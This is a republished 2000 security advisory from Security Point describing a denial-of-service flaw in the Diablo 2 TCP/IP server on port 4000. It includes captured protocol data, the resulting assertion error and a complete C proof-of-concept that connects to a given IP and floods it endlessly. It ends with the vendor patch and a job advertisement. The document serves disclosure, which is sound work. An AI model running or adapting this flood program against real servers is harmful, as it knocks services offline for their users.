Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

spad02.txt

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 7
spad02.txt
spad02.txt
spad02.txt

Security Point
This email address is being protected from spambots. You need JavaScript enabled to view it.
http://www.secpoint.com/

Advisory #002
Title: Diablo 2 spad02.txt

Security Point
This email address is being protected from spambots. You need JavaScript enabled to view it.
http://www.secpoint.com/

Advisory #002
Title: Diablo 2 TCP/IP Sever DoS
Date: 21-08-00


Copyright (c) 2000 SECURITY POINT

Contents:
=========

I Disclaimer
II Introduction
III Description
IV Demonstration code
V Fix
VI Contact
VII Job Offers
VIII Greetings

I - Disclaimer:
===============

This paper is for educational purpose only, Security Point will not be
responsible for any damages whatsoever that have a connection with the
information written in this paper. There are no warranties with regard
to this information, any use of this information is at the user's own risk.

II - Introduction:
==================

We have found a vulnerability in Diablo 2 TCP/IP Server running on port 4000.
If some malformed data is being send to port 4000 while running it will result
in the game crashing. Though windows will NOT crash with it.

III - Description:
==================

While playing around with Diablo2 on port 4000, I discovered some
problems with the TCP/IP Server. When a TCP/IP game in D2 was running, and
connected to port 4000, then sent some info, it came with a "Diablo II Server
Error".
Anyway, this bug turned out to be irregular.

So i began to explore the D2 TCP/IP Server some more. Then while listing on
port 4000 with a program, and trying to create a game, I discovered that D2
sends the following data, to the port if its occupied:

RAW:
>`
>f??g
>e??
>
>
>e??
>
>
>e??
>
>l?JM
>e??
>?#+?:???JM
ASCII codes:
>96-0-169-5-24-121-169-5-216-9-0-0-7-2-0-0-176-1-3-0-0-71-114-89-112-72-111-78-45-68-75-0-0-0-0-0-52-0-0-4-0-0-0-0-0
>102-135-234-40-0-0-0-0-0
>101-255-167-3-0-0-85-170-85-170-71-0-0-0-71-114-89-112-72-111-78-45-68-75-0-0-0-0-0-0-0-0-0-0-221-0-16-0-130-0-3-0-1-0-255-255-255-255-255-48-255-27-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-255-0-255-0-255-0-255-0-255-0-255-0-255-0-255-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-104-110-69-50-87-111-111-33-6-0-0-0-42-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-0-0-12
>101-255-167-3-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-87-83-1-0-0-0-80-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-2-1-1-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-1-119-12
>101-255-167-3-0-0-52-0-4-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-103-102-207-127-0-25-0-0-0-15-0-0-0-20-0-0-0-25-0-0-0-0-55-0-0-0-55-0-0-0-15-0-0-0-15-0-0-0-89-0-0-0-89-0-0-1-0-0-0-101-1-0-0-77-0-0-0-105-102-0-0-0-0-0-0-0-0-0-0-0-0
>0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-0-74-77-10-0-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-0-0-40-201-109-188-122-114-254-176-249-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-2-0-200-27-143-165-24-197-31-154-251-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-4-0-104-110-176-142-186-23-65-131-249-7-74-77-16-0-2-0-0-1-160-149-4-0-0-0-0-6-0-8-193-209-119-88-106-98
>108-251-7-74-77-16-0-12
>101-170-167-3-0-0-2-0-0-1-0-18-4-0-0-0-0-210-0-168-19-243-96-250-188-131-85-1-0-74-77-16-0-2-0-0-1-16-18-4-0-0-0-0-146-0-72-102-20-74-152-15-165-62-3-0-74-77-16-0-0-0-0-1-32-17-4-0-0-0-0-82-0-40-92-197-216-93-127-50-249-4-0-74-77-16-0-0-0-8-1-80-77-4-0-0-12-24-0-0-112-127-12-188-99-44-157-92-248-7-74-77-16-0-2-0-4-1-144-65-4-0-0-46-48-0-0
>232-35-43-234-58-205-187-222-249-7-74-77-16-0-2-0-5-1-80-76-4-0-0-24-24-0-0-136-118-76-211-216-31-221-199-251-7-74-77-0-0-74-77-0-0-0-0-0-0-74

(without the ">"'s, ascii code separated by "-")

Maybe this can be some sort of shutdown message, that D2 sends if the server
wasn't shut down properly? In this data there where 3 e??'s, so I started
testing how the D2 TCP/IP Server would respond if I sent some of them. At
first there wasn't much respond from the server, but if i sendt:

e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??e??\n

some (5-10) times in a row, it would come with the following message:

---------------------------------------------------------------------------
- Diablo II Server Error -X-
---------------------------------------------------------------------------
- /\ Assertion Failure -
- / \ Location: C:\D2\Source\Fog\Src\QServer\Qserver98.cpp, line #272 -
-/____\ Expression: nSize >= 0 && nSize < READ_BUFFER_SIZE -
- --------------- -
- - OK - -
- --------------- -
---------------------------------------------------------------------------

When you click OK it would crash diablo2. Then I tried with much more
e??'s, that resolved in that i only had to send something 1 time. If I
tried with a lot of eg. A's then it wouldn't crash, but if I tried with one
of the other "commands" then it would also respond with the error.

IV - Demonstration code
=======================
/*
* SPD2-DoS.c
*
* SECURITY POINT -- http://www.secpoint.com
*
* (C) COPYRIGHT SECURITY POINT 2000
* All Rights Reserved
*
* This source code is for educational purpose ONLY, Security Point will not
* be responsible for any damages whatsoever that have a connection with this
* code. There are no warranties with regard to this information.
*
* USE AT YOUR OWN RISK, BY USING THIS PROGRAM YOU ACCEPT ALL
* RESPONSIBILITY FOR THE RESULTS
*
* For questions and suggestions email This email address is being protected from spambots. You need JavaScript enabled to view it.
*
* gcc SPD2-DoS.c -o SPD2-DoS
*
*
*/


#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netdb.h>
#include <string.h>


#define OFFSET 10000

struct in_addr addr;
struct sockaddr_in address;
int d2_socket;
char sendbuffer[OFFSET];

main (int argc, char *argv[]) {
printf("Diablo 2 TCP/IP Server DoS, by http://www.secpoint.com\n");
if (argc != 2) {
printf("Usage: %s ip\n", argv[0]);
exit(0);
}
if ((d2_socket = socket(AF_INET, SOCK_STREAM,0)) < 0) {
perror("socket");
exit(0);
}
address.sin_family=AF_INET;
address.sin_addr.s_addr = inet_addr(argv[1]);
address.sin_port = htons(4000);
if (connect(d2_socket, (struct sockaddr*)&address, sizeof(address)) < 0) {
perror("connect");
exit(0);
}
memset(sendbuffer, 0x60, sizeof(sendbuffer));
while(1) {
write(d2_socket, sendbuffer, strlen(sendbuffer));
}
close(d2_socket);
printf("server killed\n");
}

V - Fix:
========
Vulnerable versions: Diablo 2 1.0, 1.01, 1.02, 1.03
Download the new patch from blizzard.com:
(http://www.blizzard.com/support/diablo2/information/patch.shtml)

VI - Contact:
=============

If you have further questions regarding this bug, then you can contact us at
www.secpoint.com
This email address is being protected from spambots. You need JavaScript enabled to view it.

VII - Job Offers:
=================
We are looking for people for:
Penetration testing of Firewalls and TCP/IP based networks.
You must have a wide knowledge of TCP/IP protocols and applications, plus solid
technical experience of UNIX or Windows NT.
The best candidate will have security experience in one or more of the
following:

? Penetration testing.
? Linux and other network operating systems .
? Web technologies: HTML, XML, JavaScript, Java, php, and asp.
? Firewall, VPN and intrusion detection integration.
? Product Certs and other forms of education.
? Routers, hubs, switches.


Finally, successful candidates must have the ability to take on responsibility
and work unsupervised in our offices and on customer sites. They must also be
able to communicate their findings to client staff via written reports and
presentations.
Another important factor is that you have a CLEAN criminal record.

Send your CV to This email address is being protected from spambots. You need JavaScript enabled to view it. (in MS Word, PDF or plain text formats)

http://www.secpoint.com


VIII - Greetings:
=================
: SecurityFocus.com, ADM
Social Media Share